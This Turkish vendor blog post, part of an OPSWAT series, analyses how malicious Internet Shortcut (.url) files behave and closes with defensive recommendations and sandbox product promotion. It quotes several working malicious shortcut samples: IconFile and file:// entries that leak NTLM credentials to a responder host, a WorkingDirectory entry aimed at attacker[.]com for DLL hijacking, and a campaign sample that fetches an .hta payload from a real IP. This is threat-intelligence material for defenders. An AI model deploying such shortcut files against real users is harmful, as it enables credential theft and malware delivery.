Kötülüğe Giden Kısayol, Bölüm 3: MetaDefender Sandbox Kullanarak URL Dosyalarının Davranışsal Analizi

Statik inceleme bir dosyanın ne içerdiğini ortaya koyarken, dinamik analiz bize ne yaptığını söyler. İnternet Kısayol dosyaları (.url) söz konusu olduğunda bu ayrım hayati önem taşır. Disk üzerinde zararsız gibi görünen bu dosyalar genellikle çok aşamalı kötü amaçlı yazılım kampanyalarında tetikleyici noktalar olarak hareket eder - uzak yükleri çalıştırır, kimlik bilgilerini çalar veya kalıcılığı etkinleştirir.

URL dosyası tehditleri serimizin bu üçüncü ve son bölümünde, dinamik davranışa odaklanıyoruz: .url dosyalarının gerçek dünyada nasıl çalıştığı ve yürütme sonrası hangi etkinlikleri ortaya çıkardıkları. Bu davranışsal perspektif en iyi şu şekilde incelenebilir MetaDefender SandboxOPSWAT'ın son kullanıcı etkileşimini taklit eden ve statik taramanın tespit edemediği yürütme yollarını ortaya çıkaran kötü amaçlı yazılım patlama ortamı.

Aşağıdaki seçeneklerden birini seçerek önceki iki blogu görüntüleyebilirsiniz:

• Bölüm 1: Kötülüğün Kısayolu: URL Dosyaları Neden Siber Tehdit Gündemine Geri Döndü?
• Bölüm 2: Kötülüğün Kısayolu: Kötü Amaçlı URL Dosyalarının Statik Analizi ve Arkasındaki Ticaret

Statik analiz şüpheli biçimlendirmeyi işaretler, ancak MetaDefender Sandbox gerçek tehlikeye işaret eden çalışma zamanı davranışlarını yakalar, örneğin:

• DNS sorguları veya saldırgan altyapısına giden HTTP bağlantıları
• Yükleri başlatmak için Windows bileşenlerinin (örn. mshta.exe, wscript.exe) çağrılması
• Otomatik başlatma konumlarına veya Windows Kayıt Defterine dosya yazma
• NTLM kimlik bilgilerini sızdıran SMB kimlik doğrulama girişimleri
• Başarısız SMB denemelerinden sonra HTTP/80 üzerinden WebDAV geri dönüş iletişimi

URL dosyalarının kötüye kullanımına ilişkin büyük resme bir başka katkı da 2018 yılında gerçekleşti ve bu kez bilgi sızıntısı ve URL dosyalarının uzaktan saldırganlar tarafından kimlik doğrulama ve kimlik bilgileri materyalinin ele geçirilmesinde rol oynama potansiyeli ile ilgiliydi. 

Mayıs ayında, Securify Windows'taki alt sistemlerin, bir kullanıcının NTLM kimlik bilgilerini saldırganın kontrolündeki bir ana bilgisayara göndermesi için kandırılabileceği çeşitli yollar olduğunu belirtti. URL dosyalarını kullanan iki yöntem açıkladılar, örneğin bu basit yöntem sadece file:// uzak bir dosyaya başvurmak için önek: 

[InternetShortcut] 

URL=file://<responder ip>/leak/leak.html

...ve bu örnekte olduğu gibi, URL işleyicisini tetiklemek için IconFile seçeneğini kullanarak işlenecek bir görüntünün çıkarılması için uzak bir simge dosyası alın:

[InternetShortcut] 

URL=https://securify.nl 

IconIndex=0 

IconFile=\\<responder ip>\leak\leak.ico

İkincisi söz konusu olduğunda, bir protokol önekinin isteğe bağlı olması, ileri veya geri eğik çizgilerin birbirinin yerine kullanılabilmesi ve SMB'nin saldırgan altyapısına riskli erişim yoluyla istenmeyen bir ayrıcalık yükseltme kanalı olarak genel kalıcılığı da dahil olmak üzere endişe verici birçok unsurun işletim sisteminde yaygın olarak görülen saldırı yüzeyinde birleştiği açıktır.

Kimlik bilgilerine erişim için IconFile seçeneğinin kullanılmasına yönelik bu aynı yaklaşım daha sonra Alex Inführ tarafından da ele alınmıştır. Belirtildiği gibi, bu URL dosyaları etkinleştirildiğinde, uzak sunuculara SMB bağlantıları başlatılır, bu da kimlik doğrulama alışverişi ve NTLM kimlik bilgisi verilerinin saldırgana ifşa edilmesiyle sonuçlanır. Çok sayıda tehdit aktörü tarafından bu tür saldırıların uzak ucunda kullanılan ortak düşman araç seti Responder'dır.

URL dosyalarının kötüye kullanım potansiyelinin bir başka yönü de Inführ tarafından DLL yan yükleme yoluyla güvenilmeyen kod çalıştırmak için dosyalardaki alanların kötüye kullanılması tartışmasında ortaya çıkmıştır. Bu kavram kanıtında, DLL arama yolunun ele geçirilmesine karşı savunmasız olan yerel bir yürütülebilir dosyaya işaret etmek için bir URL dosyası kullanılır; URL dosyası etkinleştirildiğinde, WorkingDirectory seçeneği işlenir ve yüklenen DLL için arama yolunun uzak bir SMB paylaşımında saldırgan tarafından kontrol edilen bir dizini içerecek şekilde ayarlanmasına yol açar.

[InternetShortcut]
URL=C:\windows\...\mscorsvw.exe
WorkingDirectory=\\attacker[.]com\SMBShare\

Zscaler ThreatLabz'in DBatLoader'ın Remcos ve Formbook RAT'lerini dağıtmak için kullanıldığına dair analizi gibi kötü amaçlı yazılım kampanyalarında belgelendiği üzere, URL dosyaları bir sistemde yürütme için de kullanılabilen bir kısayol dosyasıdır.  

Otomatik başlatma konumlarına bağlandığında, bu dosyalar kötü amaçlı yazılımın yeniden başlatma veya oturum açma sonrasında çalışmasını sağlamak için bir kalıcılık aracını da destekler. Bu dağıtım kampanyasında aşağıdaki URL dosyası kullanılmış ve Xdfiifag.exe'deki kötü amaçlı yazılım yükünün başlatılmasını sağlamıştır.

[InternetShortcut]
URL=dosya: "C:\\Users\\Public\\Libraries\\Xdfiifag.exe"
IconIndex=13
HotKey=49

Haziran 2023'te @AnFam17, kullanıcıları yine özellikle URL dosyaları aracılığıyla NetSupport RAT yüklerine dağıtan sosyal mühendislik tabanlı bir açılış trafiği yönlendiricisi hakkında bilgi paylaştı. Yukarı akış sosyal mühendislik tabanlı açılış sayfaları FakeSG olarak bilinen bir kite bağlıydı. Örnek URL dosyası(Güncelleyici Yükle (msi-stable(V102.84.3348).url): 

[InternetShortcut]
URL=file:\\94.158.247.6@80\Downloads\updatermsi.hta
ShowCommand=7
IconIndex=247
IconFile=C:\Windows\System32\shell32.dll

Bu URL dosyası, önceki yinelemelerde olduğu gibi file:// protokol öneki, burada ileri eğik çizgiler yerine ters eğik çizgiler kullanılarak yüksek düzeyde esneklikle temsil edilebilir ve algılama mühendisleri için zorlayıcı olabilecek bir yönü vurgular.

Burada, dosya öneklerini kullanan daha önce bahsedilen URL dosyalarına benzer şekilde, doğal bir tutarsızlığın meydana geldiğini belirtmek gerekir. Bu URL'ler söz konusu olduğunda, saldırgan yükleri bir WebDAV sunucusunda barındırmakta ve bu da içeriğin SMB kullanılarak değil, 80/tcp bağlantı noktasındaki WebDAV protokolü kullanılarak HTTP üzerinden alınmasına neden olmaktadır.

Bu konuyla bağlantılı bir diğer önemli örnek, Temmuz 2023'te kamuoyuna açıklanan CVE-2023-36884 adlı bir başka yüksek profilli güvenlik açığının ifşa edilmesiyle ortaya çıkmıştır. Bu, o zamanlar RomCom RAT'ın değiştirilmiş bir varyantının dağıtımı için bir tehdit grubu tarafından kullanılan hedefli saldırı kampanyalarında kullanıldığı bildirilen 0 günlük bir güvenlik açığıydı.  

Karmaşık, çok aşamalı tehdit zinciri, odağı URL dosya işleme konusuna döndürdü ve WebDAV üzerinden erişilen bir ZIP arşiv yolundan bir yük yüklendiğinde uzaktan kod yürütülmesinin işaretlenmediğine dair gözlemleri ortaya çıkardı. 

İnternet Kısayollarının (URL dosyaları) kötüye kullanım alanına yönelik bu geçmişe bakışla, yıllarca tehdit ortamında destekleyici bir rol oynadıklarını ve nadiren gösterinin baş yıldızı olduklarını görebiliriz. Çoğu zaman, etkinleştirici teknolojiler ve güvenlik özelliği atlamaları düşük önem derecesine sahip güvenlik açıkları olarak sıralanır ve hatta bazen güvenlik dışı hatalar olarak göz ardı edilir ve satıcılar tarafından CVE kabul seviyesine ulaşmaz.

Çoğu zaman tehdit analistleri olarak tehdit dizilerinde en bariz suçluya öncelik verir, en çok uç yüklere ve saldırganların hedefe yönelik eylemlerine vurgu yaparız. Ancak günümüz düşmanlarının, saldırı yüzeyinin azaltılmasından kaynaklanan artan maliyetlerin giderek daha karmaşık hale gelen dosya tabanlı ticaret yöntemleriyle karşılanabileceğini fark ettiklerini ve URL dosyalarını kullanan saldırı dizilerinin genellikle bu tür saldırı zincirlerinde kullanımlarının iyi bir göstergesi olduğunu belirtmek önemlidir.

OPSWAT , kuruluşların bu karmaşık ve çok katmanlı dosya tabanlı ticaret alanına odaklanmaya devam etmelerini önermektedir.

• Uzak URL dosyalarına erişim girişimlerini izleyin. Kuruluşlar, uzaktan barındırılan URL dosyalarına erişimi engellemeyi uygun bulabilir.
• Ortamda karşılaşılan URL dosyalarındaki hedefleri analiz edin ve inceleyin, file:// tabanlı protokollerin özelliklerini kötüye kullananları, harici SMB veya WebDAV yollarına atıfta bulunanları ve URL, IconFile ve WorkingDirectory alanlarındaki diğer anormallikleri arayın
• Harici, güvenilmeyen altyapı ile giden SMB ve WebDAV oturumlarını izleyin ve doğrulayın. WebDAV'yi destekleyen bir dizi hizmet ve bulut depolama çözümünün mevcut olduğunu ve 4shared, DriveHQ ve OpenDrive dahil olmak üzere tehdit kampanyalarında kötüye kullanıldığını unutmayın. Bu hizmetler saldırganlara, potansiyel kurbanları hedeflerken istismar edilebilecek halka açık ve atfedilemeyen hizmetler sağlar.
• Harici SMB hizmetlerine bağlantıları engelleyin. Yıllar süren ilişkili tehdit faaliyetleri bunun bilgi sızıntısı, uzaktan kod çalıştırma ve ilgili riskler için sürekli bir sorun kaynağı olduğunu göstermiştir. Gelecekteki saldırıların, özellikle eski işletim sistemi sürümlerine karşı bu tür taktikleri silah olarak kullanmaya devam etmesi muhtemeldir ve bu gibi kontroller, bu gibi durumlarda bilinmeyen tehditleri tespit etmeye ve engellemeye yardımcı olabilir.
• Daha derin tarama yapmak ve diğer tüm çözümlerden daha fazla dosya kaynaklı saldırıyı ortaya çıkarmak için son teknoloji Deep File Inspection® ve RetroHunt® teknolojimizden yararlanın.

Bu makale, URL dosyalarının basit kısayolların çok ötesinde nasıl hareket ettiğini göstermiştir: kimlik bilgisi sızıntılarını başlatırlar, güvenilmeyen ağlardan yükleri getirirler, DLL yüklemesini ele geçirirler ve hatta uç noktalarda kötü amaçlı yazılımları kalıcı hale getirirler.

Bu davranışları kesin olarak tespit etmenin tek yolu onları gözlemlemektir ve MetaDefender Sandbox bu noktada kritik bilgiler sağlar. Derin Dosya İncelemesinin gücü ve MetaDefender InSights tarafından sağlanan bağlamla birlikte kurumlar, öldürme zincirinin her aşamasında dosya kaynaklı tehditlerin önüne geçebilir.